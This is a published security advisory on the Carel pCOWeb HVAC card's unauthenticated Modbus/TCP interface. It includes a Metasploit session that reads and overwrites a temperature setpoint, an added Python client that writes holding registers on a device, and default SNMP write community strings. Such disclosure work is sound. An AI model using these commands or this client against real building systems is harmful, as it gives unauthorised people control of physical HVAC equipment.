Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC
As part of its feature set, the Carel pCOWeb card exposes a Modbus/TCP interface to the network. By design, Modbus provides no authentication, so anyone who can reach the device over the network can read and write its variables and thereby control the affected HVAC system.
Details
- Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface
- Affected Versions: “A 1.4.11 - B 1.4.2”, possibly others
- Fixed Versions: product obsolete
- Vulnerability Type: Unauthenticated Access
- Security Risk: high
- Vendor URL:
https://www.carel.com/product/pcoweb-card
- Vendor Status: notified / product obsolete
- Advisory URL:
https://www.redteam-pentesting.de/advisories/rt-sa-2019-014
- Advisory Status: published
- CVE: not assigned
Introduction
“The pCOWeb card is used to interface the pCO Sistema to networks that use the HVAC protocols based on the Ethernet physical standard, such as BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated Web-Server, which both contains the HTML pages relating to the specific application and allows a browser to be used for remote system management.” (from the vendor’s homepage)
It is used as an OEM module in several different HVAC systems and considered obsolete by the vendor.
More Details
While authentication is required to access the web interface (compare advisory rt-sa-2019-013 (https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-013.txt)), no authentication is necessary for using the Modbus interface on TCP port 502, since the Modbus protocol did not offer any authentication mechanism during the device's lifetime. A protocol extension adding encryption and authentication (Modbus/TCP Security, which wraps the protocol in TLS) was only proposed by the Modbus Organization in 2018 (http://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdf) and is not available on this hardware.
It is believed that this might be analogous to the problem described in CVE-2019-13549 for the special case of Rittal SK 3232 products. Other OEMs are affected, too.
Proof of Concept
The web interface of the Carel pCOWeb card allows authenticated users to read and write many variables of the system via the URL
http://192.168.0.1/config/adminpage.html
This web page seems to provide access to all Modbus variables using large tables of variables 1-207 for digital, analog and integer variables, respectively.
By connecting to TCP port 502 (Modbus/TCP), it is possible to read and write these variables without any authentication. This can be done, for example, with the Metasploit (https://www.metasploit.com/) modbusclient (https://www.rapid7.com/db/modules/auxiliary/scanner/scada/modbusclient) module, whose default action reads one holding register at the configured DATA_ADDRESS:
msf5 > use auxiliary/scanner/scada/modbusclient
msf5 auxiliary(scanner/scada/modbusclient) > set RHOSTS 192.168.0.1
RHOSTS => 192.168.0.1
msf5 auxiliary(scanner/scada/modbusclient) > set DATA_ADDRESS 10
DATA_ADDRESS => 10
msf5 auxiliary(scanner/scada/modbusclient) > run
[*] 192.168.0.1:502 - Sending READ REGISTERS...
[+] 192.168.0.1:502 - 1 register values from address 10 :
[+] 192.168.0.1:502 - [240]
[*] Auxiliary module execution completed
The returned value 240 is the configured temperature setpoint of 24.0 °C scaled by ten, because the 16-bit holding register can only store integers and the setpoint is kept in tenths of a degree. Using the same module, the setpoint can also be changed; writing 241 sets it to 24.1 °C:
msf5 auxiliary(scanner/scada/modbusclient) > set ACTION WRITE_REGISTER
ACTION => WRITE_REGISTER
msf5 auxiliary(scanner/scada/modbusclient) > set DATA 241
DATA => 241
msf5 auxiliary(scanner/scada/modbusclient) > run
[*] 192.168.0.1:502 - Sending WRITE REGISTER...
[+] 192.168.0.1:502 - Value 241 successfully written at registry address 10
[*] Auxiliary module execution completed
This allows unauthenticated attackers with network access to the device to reconfigure it.
Depending on the OEM integration, the same register addresses may be mapped to different settings, so the meaning of a given register (such as address 10 above) should be verified per product rather than assumed.
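The two Metasploit actions above are just two Modbus/TCP frames. The following added example (not part of the advisory and not Carel or Metasploit code) builds and decodes those frames with the Python standard library only, so the wire format is visible: an MBAP header followed by a function code and its arguments, with no field anywhere for credentials. It also decodes the exception response a server returns for a bad address, which the Metasploit output does not show. The host 192.168.0.1, unit id 1 and register address 10 are taken from the advisory's example; the response bytes used for the offline checks are constructed to match what the module printed, not captured from a real device.

```python
"""Minimal Modbus/TCP client for holding registers (function codes 0x03, 0x06).

Added example for this advisory, not vendor or project code. Assumptions:
unit id 1, transaction id 1, and the address/values from the advisory's
Metasploit session; a live device is only needed for the __main__ block.
"""
import socket
import struct

MBAP_LEN = 7           # transaction id (2), protocol id (2), length (2), unit id (1)
FC_READ_HOLDING = 0x03
FC_WRITE_SINGLE = 0x06

EXCEPTION_NAMES = {
    1: "illegal function",
    2: "illegal data address",
    3: "illegal data value",
    4: "server device failure",
}


class ModbusError(Exception):
    """Raised when the server answers with a Modbus exception response."""


def _frame(pdu, transaction_id=1, unit_id=1):
    """Prepend the MBAP header: protocol id is always 0 for Modbus/TCP and the
    length field counts the unit id plus the PDU. There is no auth field."""
    return struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id) + pdu


def build_read_request(address, count=1, transaction_id=1, unit_id=1):
    """READ HOLDING REGISTERS (0x03): start address and quantity of registers."""
    return _frame(struct.pack(">BHH", FC_READ_HOLDING, address, count), transaction_id, unit_id)


def build_write_request(address, value, transaction_id=1, unit_id=1):
    """WRITE SINGLE REGISTER (0x06): address and one 16-bit value."""
    return _frame(struct.pack(">BHH", FC_WRITE_SINGLE, address, value & 0xFFFF), transaction_id, unit_id)


def parse_response(frame, expected_fc):
    """Validate the MBAP header and decode the PDU.

    Returns a list of register values for 0x03 and an (address, value) tuple
    for 0x06. An exception response carries the function code with its high
    bit set, followed by a one-byte exception code.
    """
    if len(frame) < MBAP_LEN + 1:
        raise ValueError("frame too short")
    _tid, protocol_id, length, _unit = struct.unpack(">HHHB", frame[:MBAP_LEN])
    if protocol_id != 0:
        raise ValueError("not a Modbus/TCP frame (protocol id %d)" % protocol_id)
    if length != len(frame) - 6:
        raise ValueError("MBAP length %d does not match frame size" % length)
    pdu = frame[MBAP_LEN:]
    fc = pdu[0]
    if fc == (expected_fc | 0x80):
        code = pdu[1]
        raise ModbusError("exception %d: %s" % (code, EXCEPTION_NAMES.get(code, "unknown")))
    if fc != expected_fc:
        raise ValueError("unexpected function code 0x%02x" % fc)
    if fc == FC_READ_HOLDING:
        byte_count = pdu[1]
        if byte_count != len(pdu) - 2 or byte_count % 2:
            raise ValueError("byte count does not match payload")
        return list(struct.unpack(">%dH" % (byte_count // 2), pdu[2:]))
    # 0x06: on success the server echoes address and value
    return struct.unpack(">HH", pdu[1:5])


def tenths_to_celsius(raw):
    """The advisory's register 10 holds the setpoint in tenths of a degree."""
    return raw / 10.0


def read_holding(host, address, count=1, port=502, timeout=5.0):
    """Send a 0x03 request to a live device (not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_read_request(address, count))
        return parse_response(sock.recv(260), FC_READ_HOLDING)


def write_holding(host, address, value, port=502, timeout=5.0):
    """Send a 0x06 request to a live device (not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_write_request(address, value))
        return parse_response(sock.recv(260), FC_WRITE_SINGLE)


if __name__ == "__main__":
    # Reproduces the advisory's session; assumes the device is reachable.
    (raw,) = read_holding("192.168.0.1", 10)
    print("setpoint: %.1f C" % tenths_to_celsius(raw))
    print("write echo:", write_holding("192.168.0.1", 10, 241))
```

The read request is twelve bytes on the wire and the write request is also twelve; the only thing standing between an attacker and the setpoint is reachability of TCP port 502. The length check in parse_response matters in practice: devices that answer with truncated frames or with a different transaction id are common, and a client that blindly unpacks the PDU will misread them.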
Besides Modbus, the card also accepts SNMP (UDP port 161) write requests using the community string “public” or “carel” (depending on the firmware version), as documented in the manual (https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0), and it speaks BACnet/IP (UDP port 47808).
Workaround
The Carel pCOWeb card should only be connected to a segregated building-automation network that untrusted users cannot reach. Where a firewall sits in front of the device, TCP port 502 (Modbus/TCP), UDP port 161 (SNMP) and UDP port 47808 (BACnet/IP) should be reachable from the building management system only.
Fix
No updated firmware will be published for pCOWeb Cards, as they are obsolete since Dec 2017. A successor hardware with current firmware is available for OEM integrators.
Security Risk
Since the Modbus protocol implemented in the Carel pCOWeb card does not offer authentication, access to the system cannot be limited to authorised users; any attacker who can reach the device via the network can control it. This is considered to pose a high risk in the context of the Carel pCOWeb card.
Timeline
- 2019-07-17 Vulnerability identified
- 2019-08-03 Customer approved disclosure to vendor
- 2019-09-02 Vendor notified
- 2019-09-09 Vendor did not respond as promised
- 2019-09-17 Vendor could not be reached
- 2019-09-18 Vendor could not be reached
- 2019-10-28 Advisory published due to publication of CVE-2019-13549
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. In this way, security weaknesses in company networks or products are uncovered and can be fixed immediately.
As there are only a few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/